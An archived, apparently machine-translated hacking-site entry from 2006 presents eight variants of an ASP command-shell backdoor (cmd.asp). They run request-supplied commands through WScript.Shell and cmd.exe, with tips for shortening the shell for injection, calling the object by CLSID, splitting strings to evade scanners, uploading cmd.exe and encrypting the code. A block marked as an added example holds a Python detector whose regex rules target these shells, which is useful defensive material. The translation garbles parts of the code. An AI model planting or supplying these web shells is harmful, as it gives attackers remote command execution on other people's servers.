Some cmd.asp variants - vulnerability warning - the black bar safety net

2006-01-15T00:00:00
ID MYHACK58:6220066384
Type myhack58
Reporter Anonymous
Modified 2006-01-15T00:00:00

Description

The ASP backdoors discussed here are not the b/s type such as the "one word" Trojans, chop off, the ice Fox and the like; they are only those such as cmd.asp or 2005a.asp.

First, take a look at zzzeva's FSO-free cmd.asp. The code is as follows:

<form method="post"> <input type=text name="cmd" size=6 0> <input type=submit value="run"></form> <textarea readonly cols=8 0 rows=2 0> <%response. write the server. createobject("wscript. shell"). exec("cmd.exe /c "&request. form("cmd")). stdout. readall%> </textarea>

Isn't that a little long? It is awkward to write out during an injection, so let's change it.

Second, a modified version of zzzeva's FSO-free cmd.asp. The code is as follows:

<textarea readonly cols=8 0 rows=2 0> <%response. write the server. createobject("wscript. shell"). exec("cmd.exe /c "&request("cmd")). stdout. readall%>

Usage is xx.asp?cmd=net user. This form is used so that the output rows are easy to read; in fact, if appearance does not matter, it can be shorter still, which leads to the third.

Third, a shortened cmd.asp

<%response. write the server. createobject("wscript. shell"). exec("cmd.exe /c "&request("cmd")). stdout. readall%>

This one uses response.write and a variable named cmd. Why not make it shorter?

Fourth, an even shorter cmd.asp

<%=server. createobject("wscript. shell"). exec("cmd.exe /c "&request("c")). stdout. readall%>

This seems to be the shortest. Besides length, there are other places to work on.

Fifth, what if wscript.shell has been renamed? Code:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct> <%=kk. exec("cmd /c "+request("cmd")). stdout. readall%>

Of course, the classid value differs between systems, so you need to change it accordingly.

Sixth, what if it is detected by some ASP Trojan scanning software? Split the string apart. Code:

<%=server. createobject("ws"+"cript. shell"). exec("cmd.exe /c "&request("c")). stdout. readall%>

Or

<%=server. createobject("ws"&"cript. shell"). exec("cmd.exe /c "&request("c")). stdout. readall%>

The contents of the quotation marks in this code can be split anywhere; for example, it can also be split into

<%=server. createobject("ws"&"cript. shell"). exec("c"&"md.exe /c "&request("c")). stdout. readall%>
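For defenders: the classid form in the fifth variant and the literal splitting in the sixth only defeat scanners that match raw strings. The Python sketch below is an added example, not code from the original page; it normalizes ASP source before matching, and its rule names and the two non-shell samples are constructed for illustration.

```python
import re

# WScript.Shell CLSID exactly as printed on this page (the page notes it can differ per system).
SHELL_CLSID = "72c24dd5-d70a-438b-8a42-98424b88afb8"

def normalize(src: str) -> str:
    """Undo cosmetic changes: letter case, split string literals, spaced dots."""
    s = src.lower()
    s = re.sub(r'"\s*[&+]\s*"', "", s)   # "ws"&"cript" or "ws"+"cript" -> "wscript"
    return re.sub(r"\s*\.\s*", ".", s)   # "wscript. shell" -> "wscript.shell"

# Hypothetical rule names; each regex runs on the normalized text only.
RULES = {
    "shell_progid": re.compile(r'createobject\(\s*"wscript\.shell"\s*\)'),
    "shell_clsid": re.compile(r'<object\b[^>]*classid\s*=\s*"clsid:' + SHELL_CLSID + '"'),
    "request_into_exec": re.compile(r'\.exec\(\s*"[^"]*"\s*[&+]\s*request\b'),
    "stdout_readall": re.compile(r"\.stdout\.readall"),
}

def scan(src: str) -> set:
    """Return the names of all rules that match the normalized source."""
    s = normalize(src)
    return {name for name, rx in RULES.items() if rx.search(s)}

def is_command_shell(src: str) -> bool:
    """Flag a file that obtains a shell object and passes request data to exec."""
    hits = scan(src)
    return "request_into_exec" in hits and bool(hits & {"shell_progid", "shell_clsid"})

# Two listings copied from this page (with the page's spacing) and two constructed files.
SAMPLES = {
    "sixth_split": '<%=server. createobject("ws"&"cript. shell"). exec("c"&"md.exe /c "&request("c")). stdout. readall%>',
    "fifth_clsid": '<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct> <%=kk. exec("cmd /c "+request("cmd")). stdout. readall%>',
    "benign_fso": '<%=server.createobject("scripting.filesystemobject").fileexists(server.mappath("a.txt"))%>',
    "fixed_command": '<%=server.createobject("wscript.shell").exec("cmd.exe /c ver").stdout.readall%>',
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, is_command_shell(text), sorted(scan(text)))
```

The fixed_command sample matches the shell rules but is not flagged, because no request value reaches exec; a file like that is worth a manual look rather than an automatic block.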

Seventh, what if cmd.exe cannot be called? In that case, upload a cmd.exe yourself, put it in a directory from which it can be called, and change the code as follows:

<%=server. createobject("wscript. shell"). exec("e:\aspx\cmD.EXE /c "&request("c")). stdout. readall%>

Eighth, can the ASP code be encrypted? Of course it can. Tool: http://download.microsoft.com/download/winscript56/Install/1.0/WIN98MeXP/CN/sce10chs.exe